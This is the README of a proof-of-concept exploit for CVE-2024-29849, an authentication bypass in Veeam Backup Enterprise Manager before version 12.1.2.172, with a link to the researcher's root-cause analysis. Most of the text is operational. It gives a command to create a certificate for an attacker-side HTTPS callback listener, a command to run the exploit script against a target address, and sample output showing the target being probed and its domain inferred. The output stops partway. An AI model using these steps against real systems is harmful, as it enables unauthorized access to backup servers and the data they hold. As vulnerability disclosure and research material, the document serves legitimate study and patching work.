# CVE-2024-29849

Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849) by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

## Technical Analysis

A root cause analysis of the vulnerability can be found on my blog: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/

## Summary

### Supported versions?

According to the Veeam official advisory, all versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 are vulnerable.

## Usage

First, you need the right setup for a local HTTPS listener; use the following command to generate a self-signed certificate and key:

```plaintext
openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
```

Then run the script against the target, pointing it at your callback server:

```plaintext
python CVE-2024-29849.py --target https://192.168.253.180:9398/ --callback-server 192.168.253.1:443
```

Example output (ASCII art banner omitted):

```plaintext
(*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/
(*) Target https://192.168.253.180:9398 is reachable and seems to be a Veeam Backup Enterprise Manager
(*) Fetching certificate for 192.168.253.180
(*) Common Name (CN) extracted from certificate: batserver.evilcorp.local
(*) Assumed domain name: evilcorp.local
(?) Is the assumed domain name correct (Y/n)? y
(*) Target domain name is: …
```
